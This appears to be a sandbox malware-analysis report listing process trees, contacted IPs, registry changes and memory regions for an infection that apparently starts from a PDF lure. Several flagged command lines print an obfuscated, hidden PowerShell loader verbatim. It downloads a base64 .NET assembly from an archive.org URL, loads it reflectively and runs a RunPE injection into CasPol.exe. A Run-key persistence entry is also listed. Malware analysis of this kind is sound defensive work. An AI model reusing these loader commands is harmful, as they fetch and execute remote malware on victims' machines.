C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
malicious
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\privacy_policy.pdf"
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1724,i,13391688068409325489,10583059356098987935,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8

URLs

Name
IP
Malicious

IPs

IP
Domain
Country
Malicious
127.0.0.1
unknown
unknown
malicious
135.224.23.113
unknown
United States
malicious
23.47.168.24
unknown
United States
143.198.209.174
unknown
United States
188.114.96.3
unknown
European Union
207.241.227.240
unknown
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Path
malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
aFS
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
tDIText
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
tFileName
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
tFileSource
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sFileAncestors
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sDI
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sDate
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
uFileSize
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
uPageCount
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
sAssetId
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
bisSharedFile
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
aFS
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
tDIText
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
tFileName
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
sDI
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
sDate
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
uFileSize
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
uPageCount
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8
Blob

Memdumps

Base Address
Regiontype
Protect
Malicious
stack
page read and write
23FDC2C9000
heap
page read and write
21B6184E000
heap
page read and write
745AAFE000
stack
page read and write
180C46AA000
heap
page read and write
1AF16F9E000
heap
page read and write
7DF087E000
stack
page read and write
196805F1000
trusted library allocation
page read and write
20187915000
heap
page read and write
22A5F15D000
heap
page read and write
201876E7000
heap
page read and write
57DE000
stack
page read and write
137F000
heap
page read and write
377983E000
stack
page read and write
1F0D3893000
trusted library allocation
page read and write
20187A28000
heap
page read and write
1EC86141000
trusted library allocation
page read and write
203DF14A000
trusted library allocation
page read and write
20187902000
heap
page read and write
1FC80983000
trusted library allocation
page read and write
180C4E0B000
heap
page read and write
2069465F000
heap
page read and write
20185829000
heap
page read and write
22A5F3AE000
heap
page read and write
237B1944000
heap
page read and write
44D15FF000
stack
page read and write
2276DF17000
heap
page read and write
2F6DCFF000
stack
page read and write
237B3ACA000
trusted library allocation
page read and write
1D93BF30000
heap
page read and write
1AF28FE1000
trusted library allocation
page read and write
4501000
trusted library allocation
page read and write
212F3F4B000
heap
page read and write
201858BA000
heap
page read and write
22C26CCD000
heap
page read and write
20187A81000
heap
page read and write
23FDA41F000
heap
page read and write
1C5156F0000
heap
page read and write
127538F4000
trusted library allocation
page read and write
201876F3000
heap
page read and write
258D3928000
heap
page read and write
20187686000
heap
page read and write
F2568FE000
stack
page read and write
237B3C3C000
trusted library allocation
page read and write
21B5F7EE000
heap
page read and write
21700410000
trusted library allocation
page read and write
212F3F7C000
heap
page read and write
258D38FC000
heap
page read and write
20187A26000
heap
page read and write
288CCB6D000
heap
page read and write
16F0000
trusted library allocation
page read and write
251FB5FF000
heap
page read and write
1EE96CA1000
heap
page read and write
CAB2CFE000
stack
page read and write
20694693000
heap
page read and write
2276DF0F000
heap
page read and write
7FF7B3B50000
trusted library allocation
page read and write
1EE8DBB000
stack
page read and write
22A5D1D9000
heap
page read and write
D6C47CF000
stack
page read and write
2276E128000
heap
page read and write
160827A0000
heap
page execute and read and write
251FB5F6000
heap
page read and write
AC7FAE3000
stack
page read and write
201876FD000
heap
page read and write
59E0000
heap
page execute and read and write
21B5F7CC000
heap
page read and write
1AF17031000
heap
page read and write
1C0C9A30000
heap
page read and write
22C26BC2000
heap
page read and write
23FDC3C0000
heap
page read and write
1275386E000
trusted library allocation
page read and write
23FDC6C1000
heap
page read and write
2159CC0D000
heap
page read and write
201876AA000
heap
page read and write
B88B8E2000
stack
page read and write
1EE96E2C000
heap
page read and write
212F1CC6000
heap
page read and write
1D955E30000
heap
page read and write
173E47D000
stack
page read and write
1F0D131C000
heap
page read and write
160828C7000
trusted library allocation
page read and write
2159CB9A000
heap
page read and write
2159CF39000
heap
page read and write
251FD85E000
heap
page read and write
182D17D0000
heap
page read and write
1FC803CF000
trusted library allocation
page read and write
201876D2000
heap
page read and write
1D93DD76000
trusted library allocation
page read and write
1EE96CFD000
heap
page read and write
2276C067000
heap
page read and write
212F3F33000
heap
page read and write
22D528BC000
heap
page read and write
212F3BD3000
heap
page read and write
1609A7F3000
heap
page read and write
12EBB960000
heap
page read and write
1AF16FE5000
heap
page read and write
2159CBE2000
heap
page read and write
2159CC9C000
heap
page read and write
2C446406000
trusted library allocation
page read and write
21B5F74F000
heap
page read and write
2159CD8A000
heap
page read and write
1AF16FA7000
heap
page read and write
1AF16F69000
heap
page read and write
1EE83CF000
stack
page read and write
3FC0CFE000
stack
page read and write
7FF7B3B20000
trusted library allocation
page read and write
1D93D780000
trusted library allocation
page read and write
2159CBD7000
heap
page read and write
212F3F9D000
heap
page read and write
1EC82C00000
heap
page read and write
7FF7B3981000
trusted library allocation
page read and write
182D1869000
heap
page read and write
214ABCCD000
trusted library allocation
page read and write
2069462D000
heap
page read and write
10A0000
heap
page read and write
22A5F09F000
heap
page read and write
23FDC6C0000
heap
page read and write
180C4DFF000
heap
page read and write
237B3C59000
trusted library allocation
page read and write
180C471E000
heap
page read and write
7FF7B381C000
trusted library allocation
page execute and read and write
7FF7B3A50000
trusted library allocation
page read and write
182D17C8000
heap
page read and write
180C4D41000
heap
page read and write
180C4B8D000
heap
page read and write
2159CB9B000
heap
page read and write
1EE96E21000
heap
page read and write
7FF7B37DD000
trusted library allocation
page execute and read and write
214A9C9E000
heap
page read and write
1D956087000
heap
page read and write
1AF31187000
heap
page read and write
22C26CDF000
heap
page read and write
212F1F20000
heap
page read and write
22A5F40B000
heap
page read and write
214A9C40000
trusted library allocation
page read and write
12EBD516000
heap
page read and write
AC0043E000
stack
page read and write
288CABBF000
heap
page read and write
203DEF6A000
trusted library allocation
page read and write
182D17A3000
heap
page read and write
180C46A3000
heap
page read and write
1D955DF0000
heap
page execute and read and write
EEE127C000
stack
page read and write
21710031000
trusted library allocation
page read and write
1C515912000
trusted library allocation
page read and write
22A5F188000
heap
page read and write
251FD4AC000
heap
page read and write
1D93BDA5000
heap
page read and write
1EE96CD8000
heap
page read and write
180C4B4C000
heap
page read and write
203DED3D000
trusted library allocation
page read and write
180C4B85000
heap
page read and write
180C4B41000
heap
page read and write
E10000
trusted library allocation
page read and write
20694680000
heap
page read and write
21B61731000
heap
page read and write
22C26BE7000
heap
page read and write
12753473000
trusted library allocation
page read and write
22A5F056000
heap
page read and write
212F3E57000
heap
page read and write
288CCB7C000
heap
page read and write
237B31D0000
heap
page read and write
2276DEF2000
heap
page read and write
251FD3A9000
heap
page read and write
5039CFF000
stack
page read and write
127535AE000
trusted library allocation
page read and write
D9779FD000
stack
page read and write
1D93DDEA000
trusted library allocation
page read and write
20187A5E000
heap
page read and write
1EE8AB8000
stack
page read and write
CAB34FF000
stack
page read and write
745A58F000
stack
page read and write
1609AE40000
heap
page read and write
AC9B0FF000
stack
page read and write
6476AFC000
stack
page read and write
22A5F077000
heap
page read and write
21B6150F000
heap
page read and write
1E07BCCD000
heap
page read and write
7FF7B3810000
trusted library allocation
page read and write
288CCB5D000
heap
page read and write
23FDC32F000
heap
page read and write
7FF7B3AD0000
trusted library allocation
page read and write
21B615BD000
heap
page read and write
20187A4D000
heap
page read and write
2170078C000
trusted library allocation
page read and write
3FC05FA000
stack
page read and write
D977EFE000
stack
page read and write
202B0743000
heap
page read and write
251FD74F000
heap
page read and write
23FDC68E000
heap
page read and write
2276C061000
heap
page read and write
12751580000
heap
page read and write
1C5138B9000
heap
page read and write
1EE96F91000
heap
page read and write
1F0D1322000
heap
page read and write
2276E131000
heap
page read and write
258D3A18000
heap
page read and write
1AF1A99D000
trusted library allocation
page read and write
1608092B000
heap
page read and write
258D3933000
heap
page read and write
745A5CF000
stack
page read and write
22D52A90000
trusted library allocation
page read and write
1E07B7E7000
heap
page read and write
214A9CBC000
heap
page read and write
23FDC2C9000
heap
page read and write
1EE94CC0000
heap
page read and write
44D0F26000
stack
page read and write
1EE96BF7000
heap
page read and write
288CAB70000
heap
page read and write
3779938000
stack
page read and write
2276BFB5000
heap
page read and write
21B615AC000
heap
page read and write
20185800000
heap
page read and write
237B3928000
trusted library allocation
page read and write
1EE96C0C000
heap
page read and write
180C2C6B000
heap
page read and write
F2564FF000
stack
page read and write
7FF7B3970000
trusted library allocation
page read and write
202B2621000
trusted library allocation
page read and write
212F3E29000
heap
page read and write
D6C503E000
stack
page read and write
21B5F7F2000
heap
page read and write
127530F5000
heap
page read and write
16082B88000
trusted library allocation
page read and write
B88BE7E000
stack
page read and write
4A374BE000
stack
page read and write
1D93DDE7000
trusted library allocation
page read and write
6B3F07E000
stack
page read and write
22D52860000
heap
page read and write
173E93F000
stack
page read and write
1C0CBEFD000
trusted library allocation
page read and write
258D3A4D000
heap
page read and write
2069465F000
heap
page read and write
2069467F000
heap
page read and write
1EE96F73000
heap
page read and write
7FF7B3AA0000
trusted library allocation
page read and write
182D18E8000
heap
page read and write
16B0000
trusted library allocation
page read and write
288CCA63000
heap
page read and write
251FD733000
heap
page read and write
21B61748000
heap
page read and write
7FF7B37FD000
trusted library allocation
page execute and read and write
160827F0000
trusted library allocation
page read and write
22C26CBD000
heap
page read and write
1E07BCFD000
heap
page read and write
288CC5C0000
heap
page read and write
7FF7B37C4000
trusted library allocation
page read and write
251FD75E000
heap
page read and write
182D1871000
heap
page read and write
7FF7B384C000
trusted library allocation
page execute and read and write
180C46A2000
heap
page read and write
2F6DC73000
stack
page read and write
D9775CE000
stack
page read and write
BC5597D000
stack
page read and write
258D3A6C000
heap
page read and write
258D38F8000
heap
page read and write
20694693000
heap
page read and write
7FF681BFD000
unkown
page write copy
217003E9000
trusted library allocation
page read and write
2276DEA2000
heap
page read and write
1F0D1328000
heap
page read and write
23FDA408000
heap
page read and write
1EE96F79000
heap
page read and write
258D3935000
heap
page read and write
22A5F430000
heap
page read and write
7FF7B3A00000
trusted library allocation
page read and write
1E07BD9A000
heap
page read and write
217016B6000
trusted library allocation
page read and write
1D955E64000
heap
page read and write
521E000
stack
page read and write
1E07BF72000
heap
page read and write
258D3933000
heap
page read and write
BBB683B000
stack
page read and write
7FF7B3800000
trusted library allocation
page read and write
217003ED000
trusted library allocation
page read and write
B88C13F000
stack
page read and write
2C4459B7000
heap
page read and write
212F3C14000
heap
page read and write
237B3240000
heap
page readonly
288CCA7E000
heap
page read and write
203DE860000
heap
page execute and read and write
160809EC000
heap
page read and write
203DE840000
heap
page read and write
214A9CDF000
heap
page read and write
21B618A0000
heap
page read and write
AC0053E000
stack
page read and write
288CCEBF000
heap
page read and write
23FDC2E6000
heap
page read and write
13B6000
heap
page read and write
1AF18840000
heap
page readonly
2C445E64000
trusted library allocation
page read and write
1C0CB4B6000
heap
page execute and read and write
C70000
heap
page read and write
214A9D07000
heap
page read and write
288CCDB2000
heap
page read and write
258D3A58000
heap
page read and write
258D396E000
heap
page read and write
212F1CBA000
heap
page read and write
22A5F13C000
heap
page read and write
203DEB73000
trusted library allocation
page read and write
7FF7B3AF0000
trusted library allocation
page read and write
214AB680000
heap
page read and write
1609A868000
heap
page read and write
288CCB83000
heap
page read and write
1E07BD9A000
heap
page read and write
12751675000
heap
page read and write
7FF7B3AB0000
trusted library allocation
page read and write
7FF7B3880000
trusted library allocation
page execute and read and write
2018583E000
heap
page read and write
5AEF000
stack
page read and write
2276E131000
heap
page read and write
EF1F3FE000
stack
page read and write
22A5D154000
heap
page read and write
182D18CD000
heap
page read and write
12EBDF11000
trusted library allocation
page read and write
12EBD8F7000
heap
page execute and read and write
2276DEE2000
heap
page read and write
953D1FE000
stack
page read and write
202B0791000
heap
page read and write
212F3BD3000
heap
page read and write
1EE96D1A000
heap
page read and write
258D3CAF000
heap
page read and write
22D5287E000
heap
page read and write
21B6183B000
heap
page read and write
E26000
trusted library allocation
page execute and read and write
1EE96BA2000
heap
page read and write
461D7E000
stack
page read and write
180C4D36000
heap
page read and write
20694693000
heap
page read and write
1E079C90000
heap
page read and write
7FF7B3992000
trusted library allocation
page read and write
206945B0000
heap
page read and write
2276E247000
heap
page read and write
22A5F072000
heap
page read and write
201877BD000
heap
page read and write
288CAC58000
heap
page read and write
1E07BF72000
heap
page read and write
180C2C6A000
heap
page read and write
7FF7B3AE3000
trusted library allocation
page read and write
22A5F3ED000
heap
page read and write
206945E2000
heap
page read and write
20694667000
heap
page read and write
1C0C9E25000
heap
page read and write
7FF7B3962000
trusted library allocation
page read and write
12753550000
trusted library allocation
page read and write
1AF29DA8000
trusted library allocation
page read and write
1D93DD7A000
trusted library allocation
page read and write
53DCD7E000
stack
page read and write
6B3FB4E000
stack
page read and write
2159CE86000
heap
page read and write
20694651000
heap
page read and write
1EE96B97000
heap
page read and write
212F3E37000
heap
page read and write
1F0D388D000
trusted library allocation
page read and write
180C471E000
heap
page read and write
38D6837000
stack
page read and write
2159CF37000
heap
page read and write
173E679000
stack
page read and write
1EE96F79000
heap
page read and write
21B614C2000
heap
page read and write
21B615F8000
heap
page read and write
2159CC0E000
heap
page read and write
16082C66000
trusted library allocation
page read and write
7FF7B3AB0000
trusted library allocation
page read and write
2F6DDFE000
stack
page read and write
2159CF77000
heap
page read and write
1E07BF72000
heap
page read and write
288CCDD3000
heap
page read and write
21B61731000
heap
page read and write
251FD59A000
heap
page read and write
2276DFFD000
heap
page read and write
251FD3A2000
heap
page read and write
1D93D7B0000
heap
page readonly
44D13FC000
stack
page read and write
214ABF4E000
trusted library allocation
page read and write
1D93E0BC000
trusted library allocation
page read and write
2F6E23E000
stack
page read and write
1F0D3281000
trusted library allocation
page read and write
1EE9704F000
heap
page read and write
7FF7B3B30000
trusted library allocation
page read and write
258D1AB8000
heap
page read and write
1C5151E0000
trusted library allocation
page read and write
7FF7B37F3000
trusted library allocation
page execute and read and write
1C0C9AA3000
heap
page read and write
1AF1A3AA000
trusted library allocation
page read and write
201876FD000
heap
page read and write
2159CCE8000
heap
page read and write
1EE96C0D000
heap
page read and write
1C0C9AEA000
heap
page read and write
53DD33E000
stack
page read and write
1E07BF53000
heap
page read and write
1609A7B0000
heap
page read and write
22A5F0A6000
heap
page read and write
18A0000
heap
page read and write
2F6DF7E000
stack
page read and write
1AF30E00000
heap
page execute and read and write
1C51590B000
trusted library allocation
page read and write
1EC82C3E000
heap
page read and write
16082810000
trusted library allocation
page read and write
2159CD8A000
heap
page read and write
196803E3000
trusted library allocation
page read and write
1D93D7C0000
trusted library allocation
page read and write
288CCB68000
heap
page read and write
21B61749000
heap
page read and write
212F3D25000
heap
page read and write
1EC86129000
trusted library allocation
page read and write
212F3BA0000
heap
page read and write
1EE96C0D000
heap
page read and write
258D3A65000
heap
page read and write
2276E15D000
heap
page read and write
1E07BFA0000
heap
page read and write
1EE86FE000
stack
page read and write
22A5F40A000
heap
page read and write
1D93D7D0000
heap
page read and write
258D3A35000
heap
page read and write
7FF7B37ED000
trusted library allocation
page execute and read and write
20694659000
heap
page read and write
BC55DFF000
stack
page read and write
4A36FFD000
stack
page read and write
258D3923000
heap
page read and write
258D3A75000
heap
page read and write
12EBB99D000
heap
page read and write
2276E02A000
heap
page read and write
7FF7B37D2000
trusted library allocation
page read and write
EEE0893000
stack
page read and write
53DD1B8000
stack
page read and write
1F0D1363000
heap
page read and write
23FDA40B000
heap
page read and write
182D176C000
heap
page read and write
507F000
stack
page read and write
2276DEB2000
heap
page read and write
7FF7B3AA0000
trusted library allocation
page read and write
20694659000
heap
page read and write
1FC803D9000
trusted library allocation
page read and write
251FD59A000
heap
page read and write
1EE89BE000
stack
page read and write
9467638000
stack
page read and write
1C0CC066000
trusted library allocation
page read and write
D977AFF000
stack
page read and write
258D393F000
heap
page read and write
251FD3E7000
heap
page read and write
180C46C0000
heap
page read and write
2159CC0E000
heap
page read and write
202B2060000
trusted library allocation
page read and write
180C2B60000
heap
page read and write
1AF30E67000
heap
page execute and read and write
2159CB92000
heap
page read and write
20187A38000
heap
page read and write
D6C4DBF000
stack
page read and write
21700782000
trusted library allocation
page read and write
7FF7B3876000
trusted library allocation
page read and write
12EBBC45000
heap
page read and write
1E07B80E000
heap
page read and write
2A30000
heap
page execute and read and write
23FDC65B000
heap
page read and write
180C4707000
heap
page read and write
20694693000
heap
page read and write
22D54907000
trusted library allocation
page read and write
20694665000
heap
page read and write
288CCDA8000
heap
page read and write
23FDA3E9000
heap
page read and write
1F0D12D5000
heap
page read and write
20694500000
heap
page read and write
